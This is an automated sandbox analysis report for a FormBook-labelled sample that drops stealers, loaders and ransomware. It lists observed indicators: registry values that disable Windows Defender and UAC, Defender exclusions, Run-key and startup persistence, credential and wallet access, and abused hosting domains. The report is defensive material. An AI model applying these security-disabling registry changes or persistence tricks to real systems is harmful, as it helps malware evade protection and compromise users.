Analysis Overview
SHA256
69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Threat Level: Known bad
The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.
Malicious Activity Summary
TargetCompany,Mallox
Lumma Stealer
Amadey
RisePro
RedLine
AsyncRat
PrivateLoader
Detect Xworm Payload
Modifies firewall policy service
Xworm
RedLine payload
UAC bypass
Windows security bypass
Modifies Windows Defender Real-time Protection settings
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Renames multiple (3581) files with added filename extension
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of local email clients
Identifies Wine through registry keys
Drops startup file
.NET Reactor protector
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks BIOS information in registry
Windows security modification
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Unsigned PE
Enumerates physical storage devices
outlook_win_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Runs ping.exe
Suspicious behavior: RenamesItself
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
System policy modification
Kills process with taskkill
GoLang User-Agent
outlook_office_path
Modifies system certificate store
Modifies registry class
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 15:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 15:54
Reported
2024-06-01 16:41
Platform
win10v2004-20240508-en
Max time kernel
226s
Max time network
404s
Command Line
Signatures
Amadey
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Lumma Stealer
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
TargetCompany,Mallox
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (3581) files with added filename extension
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\mixinte.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\ADServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Egt2KEDlnEDPcHbFceEZsAgS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster2663.lnk | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bAyFUgihOmry7UanLMPlSg0f.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UnWnb8fpIRuRuUDL2hrh8crR.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2663.lnk | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qBZ6zP2KgZdQaOhCd7LCnPnD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jRT49afIpKbuIh72Jl4Dld3H.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J6M0PD9v12iBlUQzTRVA27yZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine | C:\Users\Admin\Desktop\a\random.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP2663 = "C:\\Users\\Admin\\AppData\\Local\\RageMP2663\\RageMP2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest2663 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest2663\\MaxLoonaFest2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\\AdobeUpdaterV2663.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\U: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\E: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\J: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Desktop\a\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\a\lenin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-125_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\23.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_crop_handles.mp4 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxSignature.p7x | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
